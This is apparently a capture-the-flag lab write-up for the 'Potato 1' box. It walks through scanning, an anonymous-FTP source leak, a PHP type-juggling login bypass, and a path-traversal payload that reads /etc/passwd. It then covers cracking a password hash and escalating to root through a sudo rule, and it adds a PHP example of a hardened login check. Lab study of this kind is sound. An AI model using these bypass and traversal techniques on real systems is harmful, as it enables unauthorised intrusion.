Potato 1
Easy, Real life like

I completed this box in three steps:
Enumeration: Nmap showed the way in
Exploitation: Burp proxy and a PHP vulnerability
Post exploitation: abusing admin permission
So let's go through it in detail.
1. Enumeration
1) First I need the target IP, so:
netdiscover -i eth0 -r 10.0.0.0/16
which gave me the IP: 10.0.2.39
2) As always, I started with a scan of all ports:
nmap -p- -v -Pn 10.0.2.39
and found 3 open ports:
Discovered open port 22/tcp on 10.0.2.39
Discovered open port 80/tcp on 10.0.2.39
Discovered open port 2112/tcp on 10.0.2.39
3) Now digging deeper into those ports:
nmap -sV -O -p80,22,2112 -v -Pn 10.0.2.39
An unusual port is running FTP:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
2112/tcp open ftp ProFTPD
4) As it has a web page, I started dirbuster to scan it:


5) A Nikto scan also revealed similar info to dirbuster:
nikto -h http://10.0.2.39/
The scan report:
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
6) Found /admin and /admin/index.php. Both pages show a login form.

7) I tried to brute force or guess the password, but failed.
8) Found logs.txt, but nothing interesting in it except a note that the admin had changed the password.

9) After some failed brute-force attempts, I focused on FTP. FTP login:
ftp -p 10.0.2.39 2112
I found that anonymous login was allowed, and two interesting files:
-rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg
I downloaded those files:
get index.php.bak
2. Exploitation
10) index.php.bak shows the source code:

11) I tried SQL injection but failed. After some research, I found an article about PHP type juggling. It helped!
12) Successfully exploited this vulnerability by sending password[]="" as the password parameter.
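To make clear why an array in the password parameter gets past the login, here is an added example (not the box's index.php, which the write-up shows only as a screenshot). It assumes the login compares the submitted password with strcmp() and a loose == 0, the pattern that type juggling defeats, and puts a hardened check beside it; the secret and the request bodies are constructed.

```php
<?php
// Added example, not the box's index.php.
// Assumption: the login used strcmp($password, $expected) == 0; $expected is constructed.

$expected = 'constructed-example-secret';

// Weak check. On PHP 7.x, strcmp() given an array emits a warning and returns NULL,
// and NULL == 0 is true, so password[]= passes without the real password.
// PHP 8 throws a TypeError instead, which at least fails closed.
function weakLogin($password, string $expected): bool
{
    return strcmp($password, $expected) == 0;
}

// Hardened check: refuse anything that is not a string before comparing, then
// compare against a stored password_hash() digest with a constant-time verify.
function safeLogin($password, string $storedHash): bool
{
    if (!is_string($password)) {
        return false;           // arrays, null and numbers never reach the comparison
    }
    return password_verify($password, $storedHash);
}

$storedHash = password_hash($expected, PASSWORD_DEFAULT);

// What $_POST['password'] holds for a normal guess and for the password[]="" request.
$requests = [
    'plain guess' => 'wrong',
    'array trick' => [''],
];

foreach ($requests as $label => $submitted) {
    try {
        $weak = weakLogin($submitted, $expected) ? 'accepted' : 'rejected';
    } catch (TypeError $e) {
        $weak = 'TypeError (PHP 8)';
    }
    $safe = safeLogin($submitted, $storedHash) ? 'accepted' : 'rejected';
    printf("%-12s weak: %-18s hardened: %s\n", $label, $weak, $safe);
}
```

Run it under PHP 7 and PHP 8 to see the difference in how the weak check fails; the hardened check rejects the array on both.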

13) Result:

14) But I got an access denied message:

15) The other pages have nothing interesting except the Logs page. I intercepted all the requests with Burp and found an interesting parameter in the logs request. This will probably lead to LFI.

16) I tried file=../../../../../etc/passwd

17) This returned webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6. I ran the hash through John the Ripper and got:
user: webadmin
pass: dragon
18) Now log in over SSH:
ssh webadmin@10.0.2.39
and eventually I found the user flag.

3. Post Exploitation
19) Now I need root access. I looked for a way to get higher privileges than webadmin's.

20) Here, webadmin can execute /notes and anything after it. That's the key point! I created a small shell and executed it.

21) Finally I got the root flag in /root/root.txt:
bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==
Hope this write-up helps you. Any feedback is appreciated.